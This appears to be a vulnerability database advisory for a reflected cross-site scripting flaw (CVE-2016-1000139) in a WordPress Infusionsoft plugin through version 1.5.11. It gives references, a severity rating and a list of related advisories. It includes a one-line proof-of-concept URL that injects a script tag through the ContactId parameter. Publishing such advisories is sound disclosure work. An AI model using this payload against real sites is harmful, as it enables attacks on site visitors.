Infusionsoft Gravity Forms Add-on <= 1.5.11 – Unauthenticated Reflected Cross-Site Scripting (XSS) | CVE 2016-1000139

Description

The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://www.example.com/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"

Affects Plugins

infusionsoft

Fixed in 1.5.12

References

CVE

CVE-2016-1000139

URL

http://www.vapidlabs.com/wp/wp_advisory.php?v=864

URL

https://www.openwall.com/lists/oss-security/2016/04/12/8

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

6.1 (medium)

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

ethicalhack3r

Verified

WPVDB ID

0a60039b-a08a-4f51-a540-59f397dceb6a

Timeline

Publicly Published

2016-04-12 (about 9 years ago)

Added

2016-04-13 (about 9 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2023-12-05

Title

WooCommerce Payments < 6.5.0 - Contributor+ Cross-Site Scripting

Published

2023-01-06

Title

WP Extended Search < 2.1.2 - Contributor+ Stored XSS via Shortcode

Published

2014-08-01

Title

VideoJS - Cross-Site Scripting (XSS)

Published

2025-01-24

Title

Sensly Online Presence <= 0.6 - Admin+ Stored XSS

Published

2021-05-25

Title

Cookie Law Bar <= 1.2.1 - Authenticated Stored Cross-Site Scripting (XSS)